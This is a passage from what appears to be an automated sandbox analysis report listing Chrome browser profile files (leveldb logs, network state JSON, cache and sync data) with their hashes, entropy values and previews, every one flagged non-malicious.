                                                                                                                                                                                Preview: 2021/10/25-18:17:19.575 91c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/10/25-18:17:19.577 91c Recovering log #3.2021/10/25-18:17:19.578 91c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):427
                                                                                                                                                                                Entropy (8bit):5.271732460508218
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaSWSQWM+q2PWXp+N23iKKdKusNpV/2jMGIFUtnaSwwG1ZmwBaSaQWMVkwOWXpM:paH3+va5KkFFUtnaTz1/Ba6V5f5KkOJ
                                                                                                                                                                                MD5:E53E7DA48D3CE612D95A464CB39FB246
                                                                                                                                                                                SHA1:B4D602DEF0DC0CD28DC374801973E5AA685E9B5C
                                                                                                                                                                                SHA-256:BF6448CE3781E73DF769E8E96AB33F9346B9D906EB64A41F81908F597C17D399
                                                                                                                                                                                SHA-512:BF2FCE9209B134BD3A95F94BC1681B94203B68B940CA3C28867B401D6134E483543BB78F5B8A784F4BE23AAD5F893C0378BCF01161C228DC7AB0031862A659B1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:19.575 91c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/10/25-18:17:19.577 91c Recovering log #3.2021/10/25-18:17:19.578 91c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent State (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):420
                                                                                                                                                                                Entropy (8bit):4.985305467053914
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
                                                                                                                                                                                MD5:C401B619D9D8E0ADABC25A47EE49CFBA
                                                                                                                                                                                SHA1:C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
                                                                                                                                                                                SHA-256:8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
                                                                                                                                                                                SHA-512:BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):432
                                                                                                                                                                                Entropy (8bit):5.307793251154311
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:paQ0va5KkmiuFUtnaQ5/BaQFg5f5Kkm2J:ea5KkSg4f5Kkr
                                                                                                                                                                                MD5:3E3DD12F995A45BAD86A036F2A85AEF9
                                                                                                                                                                                SHA1:04463BBF4115FFC68233F01C44B05D70ED199DA6
                                                                                                                                                                                SHA-256:579C9E7451EB1EE7788ED89E08259840D29F735675B7EB615832847841F7EECA
                                                                                                                                                                                SHA-512:A8D698BCB36BBC1CB87BFB5878E5FFCE101ECFE27C598E081BA02452B2C55C64C28627759F808B81F4B87E3A09EE11CB339F45DD5F0381834C592E3BBD6A7CBC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:19.714 14f8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/MANIFEST-000001.2021/10/25-18:17:19.718 14f8 Recovering log #3.2021/10/25-18:17:19.719 14f8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\LOG.old. (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):432
                                                                                                                                                                                Entropy (8bit):5.307793251154311
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:paQ0va5KkmiuFUtnaQ5/BaQFg5f5Kkm2J:ea5KkSg4f5Kkr
                                                                                                                                                                                MD5:3E3DD12F995A45BAD86A036F2A85AEF9
                                                                                                                                                                                SHA1:04463BBF4115FFC68233F01C44B05D70ED199DA6
                                                                                                                                                                                SHA-256:579C9E7451EB1EE7788ED89E08259840D29F735675B7EB615832847841F7EECA
                                                                                                                                                                                SHA-512:A8D698BCB36BBC1CB87BFB5878E5FFCE101ECFE27C598E081BA02452B2C55C64C28627759F808B81F4B87E3A09EE11CB339F45DD5F0381834C592E3BBD6A7CBC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:19.714 14f8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/MANIFEST-000001.2021/10/25-18:17:19.718 14f8 Recovering log #3.2021/10/25-18:17:19.719 14f8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000003.log
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: *...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):415
                                                                                                                                                                                Entropy (8bit):5.309742497762612
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaQcq2PWXp+N23iKKdKusNpZQMxIFUtnaBXZmwBayzkwOWXp+N23iKKdKusNpZb:pafva5KkMFUtnaN/Bayz5f5KkTJ
                                                                                                                                                                                MD5:11BC1803CCB96057B609DA9413AEB635
                                                                                                                                                                                SHA1:DB90C2461513D3164536D9326D90F70CEFA82102
                                                                                                                                                                                SHA-256:266821629096EFE230AD2F476EA56778A472296420A6BEDF8B3D9CDA38FA28CD
                                                                                                                                                                                SHA-512:2D3A85F3717867E2597AE8A82AA38D8EAB4E3981B6C4D28EC8993A7884A803E4D11225B27C30A3645C167C25B0E0E588ED5378A96D0F9F9305A58383C8078070
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:35.789 c24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.2021/10/25-18:17:35.791 c24 Recovering log #3.2021/10/25-18:17:35.792 c24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):415
                                                                                                                                                                                Entropy (8bit):5.309742497762612
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaQcq2PWXp+N23iKKdKusNpZQMxIFUtnaBXZmwBayzkwOWXp+N23iKKdKusNpZb:pafva5KkMFUtnaN/Bayz5f5KkTJ
                                                                                                                                                                                MD5:11BC1803CCB96057B609DA9413AEB635
                                                                                                                                                                                SHA1:DB90C2461513D3164536D9326D90F70CEFA82102
                                                                                                                                                                                SHA-256:266821629096EFE230AD2F476EA56778A472296420A6BEDF8B3D9CDA38FA28CD
                                                                                                                                                                                SHA-512:2D3A85F3717867E2597AE8A82AA38D8EAB4E3981B6C4D28EC8993A7884A803E4D11225B27C30A3645C167C25B0E0E588ED5378A96D0F9F9305A58383C8078070
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:35.789 c24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.2021/10/25-18:17:35.791 c24 Recovering log #3.2021/10/25-18:17:35.792 c24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):430
                                                                                                                                                                                Entropy (8bit):5.2295694189512405
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:pafova5KkkGHArBFUtnaf/Bao5f5KkkGHAryJ:Aaa5KkkGgPgOf5KkkGga
                                                                                                                                                                                MD5:B3C2A95469B1D20E03D2A715B17623FC
                                                                                                                                                                                SHA1:9AC169888CDCBBFB1CD257C9D11317E5B0DC160F
                                                                                                                                                                                SHA-256:DF8D0E37F036E9AE6CFCB2C5F147E416F700BD84F2DF54040EFF44A7DAAD2A8C
                                                                                                                                                                                SHA-512:A93C31EDEBB1D35D4773FA9155EB408F7993648BA89E8B5ECC33CC70B416483C4C4199084314F2BCB5BCE8F7DFC1E8DE1ED9137D8C1AF217F446CC40BAAC1A81
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:18:02.734 14f8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.2021/10/25-18:18:02.736 14f8 Recovering log #3.2021/10/25-18:18:02.737 14f8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):430
                                                                                                                                                                                Entropy (8bit):5.2295694189512405
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:pafova5KkkGHArBFUtnaf/Bao5f5KkkGHAryJ:Aaa5KkkGgPgOf5KkkGga
                                                                                                                                                                                MD5:B3C2A95469B1D20E03D2A715B17623FC
                                                                                                                                                                                SHA1:9AC169888CDCBBFB1CD257C9D11317E5B0DC160F
                                                                                                                                                                                SHA-256:DF8D0E37F036E9AE6CFCB2C5F147E416F700BD84F2DF54040EFF44A7DAAD2A8C
                                                                                                                                                                                SHA-512:A93C31EDEBB1D35D4773FA9155EB408F7993648BA89E8B5ECC33CC70B416483C4C4199084314F2BCB5BCE8F7DFC1E8DE1ED9137D8C1AF217F446CC40BAAC1A81
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:18:02.734 14f8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.2021/10/25-18:18:02.736 14f8 Recovering log #3.2021/10/25-18:18:02.737 14f8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent State.. (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):420
                                                                                                                                                                                Entropy (8bit):4.954960881489904
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:YHO8sdvBVSsB6M/BVSsBdLJlyH7E4f3K33y:YXsdvjX6gjXdL3yH7n/iy
                                                                                                                                                                                MD5:F4FEFEEEC722772F9DC0FCE1B52D79B5
                                                                                                                                                                                SHA1:00EECFA3B37113D30E7D43BE4383C540F3D93D4D
                                                                                                                                                                                SHA-256:D33E13C12004A700F246D8C73709114A881609D658E045D54DE36874728D07F0
                                                                                                                                                                                SHA-512:41E61EC89366800FD5F4DD704E53B47DE29411B9088B46349A0A350758D08569C14DCC70CF8D6A6FE6D049CB6D32F2B091153E8148A1B5857BD7AF13492071BE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543498399332","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543498399332","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                Entropy (8bit):5.233381012217626
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:paQyva5KkkGHArqiuFUtnaB/BaOFR5f5KkkGHArq2J:oa5KkkGgCggf5KkkGg7
                                                                                                                                                                                MD5:2E5D98AC0381D7999EF5AE223DB2A554
                                                                                                                                                                                SHA1:C90959F746B83252BFE7A598E78B79D0C26606F1
                                                                                                                                                                                SHA-256:69147B4F311A73C06EADB063AA349B6364DC79D0FB430B03A375673BD3494746
                                                                                                                                                                                SHA-512:F28A70A2D219CC3543C2AE1EFA8526787FBD3B927E2DC5B444B77BB112F214A60723EAAA1C95218C69F56D27319DB0724984162B09462FB43C01694828D880CF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:18:02.754 c38 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/MANIFEST-000001.2021/10/25-18:18:02.755 c38 Recovering log #3.2021/10/25-18:18:02.756 c38 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                Entropy (8bit):5.233381012217626
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:paQyva5KkkGHArqiuFUtnaB/BaOFR5f5KkkGHArq2J:oa5KkkGgCggf5KkkGg7
                                                                                                                                                                                MD5:2E5D98AC0381D7999EF5AE223DB2A554
                                                                                                                                                                                SHA1:C90959F746B83252BFE7A598E78B79D0C26606F1
                                                                                                                                                                                SHA-256:69147B4F311A73C06EADB063AA349B6364DC79D0FB430B03A375673BD3494746
                                                                                                                                                                                SHA-512:F28A70A2D219CC3543C2AE1EFA8526787FBD3B927E2DC5B444B77BB112F214A60723EAAA1C95218C69F56D27319DB0724984162B09462FB43C01694828D880CF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:18:02.754 c38 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/MANIFEST-000001.2021/10/25-18:18:02.755 c38 Recovering log #3.2021/10/25-18:18:02.756 c38 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: *...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):415
                                                                                                                                                                                Entropy (8bit):5.253192408872276
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:pacva5KkkGHArAFUtnap/Bas5f5KkkGHArfJ:Xa5KkkGgkgif5KkkGgV
                                                                                                                                                                                MD5:298AD44B5AF85F9AB4388E5C91B27927
                                                                                                                                                                                SHA1:0DAAF7B46104A9740FB6C8DA730B4E035B0A6BFB
                                                                                                                                                                                SHA-256:1D21A96D6C455873BB1013BDA3FD7EEDF12C8A0CEA97B2A41B0ACD62E299D2F5
                                                                                                                                                                                SHA-512:F8D1A4B5136A4E8C1BC38249FC5BF6DA586F72D69A07179C5370E4C065C757B121067F3BCB3BE27C7B95166F721FC591750CE07242E12352B375140CD505B39C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:18:17.939 f64 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.2021/10/25-18:18:17.940 f64 Recovering log #3.2021/10/25-18:18:17.941 f64 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG.old.c (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):415
                                                                                                                                                                                Entropy (8bit):5.253192408872276
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:pacva5KkkGHArAFUtnap/Bas5f5KkkGHArfJ:Xa5KkkGgkgif5KkkGgV
                                                                                                                                                                                MD5:298AD44B5AF85F9AB4388E5C91B27927
                                                                                                                                                                                SHA1:0DAAF7B46104A9740FB6C8DA730B4E035B0A6BFB
                                                                                                                                                                                SHA-256:1D21A96D6C455873BB1013BDA3FD7EEDF12C8A0CEA97B2A41B0ACD62E299D2F5
                                                                                                                                                                                SHA-512:F8D1A4B5136A4E8C1BC38249FC5BF6DA586F72D69A07179C5370E4C065C757B121067F3BCB3BE27C7B95166F721FC591750CE07242E12352B375140CD505B39C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:18:17.939 f64 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.2021/10/25-18:18:17.940 f64 Recovering log #3.2021/10/25-18:18:17.941 f64 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\fb916b91-1de5-4a97-a1b9-d05f0ecb0538.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):420
                                                                                                                                                                                Entropy (8bit):4.954960881489904
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:YHO8sdvBVSsB6M/BVSsBdLJlyH7E4f3K33y:YXsdvjX6gjXdL3yH7n/iy
                                                                                                                                                                                MD5:F4FEFEEEC722772F9DC0FCE1B52D79B5
                                                                                                                                                                                SHA1:00EECFA3B37113D30E7D43BE4383C540F3D93D4D
                                                                                                                                                                                SHA-256:D33E13C12004A700F246D8C73709114A881609D658E045D54DE36874728D07F0
                                                                                                                                                                                SHA-512:41E61EC89366800FD5F4DD704E53B47DE29411B9088B46349A0A350758D08569C14DCC70CF8D6A6FE6D049CB6D32F2B091153E8148A1B5857BD7AF13492071BE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543498399332","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543498399332","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):160
                                                                                                                                                                                Entropy (8bit):3.0217164415295743
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:sLollttz6sjlGXU2tk0lkGgGgGgGgGg:qolXtWswXU2tkEtttt
                                                                                                                                                                                MD5:DE92AD90BE6D3364745B2F73F4C3CF73
                                                                                                                                                                                SHA1:9158681463BD30E5AF4DDA4BAAC81F93CEDBDA77
                                                                                                                                                                                SHA-256:0025A3E0D3B834401B3B5F820E1991EF7E810D9A4B8B6B579E6301C94E7031A0
                                                                                                                                                                                SHA-512:9E81CEFC195439439F4B23EE7696309D7BC3C08E5B444D2ABDE26D2F12B2D3BCFD124FB9A2D40C6389E9F787741676FAD366A2E9982674E7B931028C014D8A79
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ...n'................_mts_schema_descriptor.....F..................F..................F..................F..................F..................F................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                Entropy (8bit):5.259619402993821
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaO1AVq2PWXp+N23iKKdKpIFUtnaOXuNAgZmwBaOMyAIkwOWXp+N23iKKdKa/Wd:palVva5KkmFUtna+uSg/BarTI5f5KkaQ
